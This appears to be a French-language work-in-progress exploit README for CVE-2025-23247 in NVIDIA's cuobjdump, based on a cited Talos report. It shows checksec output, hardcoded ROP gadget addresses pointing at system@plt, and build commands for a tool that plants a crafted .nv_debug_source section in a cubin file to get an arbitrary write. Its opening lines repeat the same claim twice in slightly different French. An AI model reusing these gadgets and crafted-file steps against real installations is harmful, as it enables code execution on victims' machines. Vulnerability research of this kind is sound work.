
travail en cours pour CVE-2025-23247. Pour l’instant, simple PoC de crash qui montre que nous contrôlons le buffer et l’offset, donc nous avons un aaw
Epic Collab avec @reubensammut :) comme toujours :)
wip pour CVE-2025-23247 . Pour l'instant juste un crash PoC qui montre qu'on contrôle le buffer et l'offset, donc on a une AAW.
Bug provenant de https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151
checksec ./cuobjdump [*] '/home/vlad/cuobjdump' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
Bref, on a pas de PIE donc
uint64_t system_plt = 0x401d90; uint64_t pop_rdi_ret = 0x402d1b; uint64_t ret_gadget = 0x402d1c; // Just a ret
Point de crash

gcc -o modify_simple modify_simple.c vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin Created modified_simple2.cubin with vulnerable .nv_debug_source section Run: ./cuobjdump --dump-elf modified_simple2.cubin
Et pour le kernel CUDA
nvcc -ptx simple.cu -o simple.ptx nvcc -cubin simple.ptx -o simple.cubin --generate-line-info ou nvcc -cubin simple.cu -o simple.cubin --generate-line-info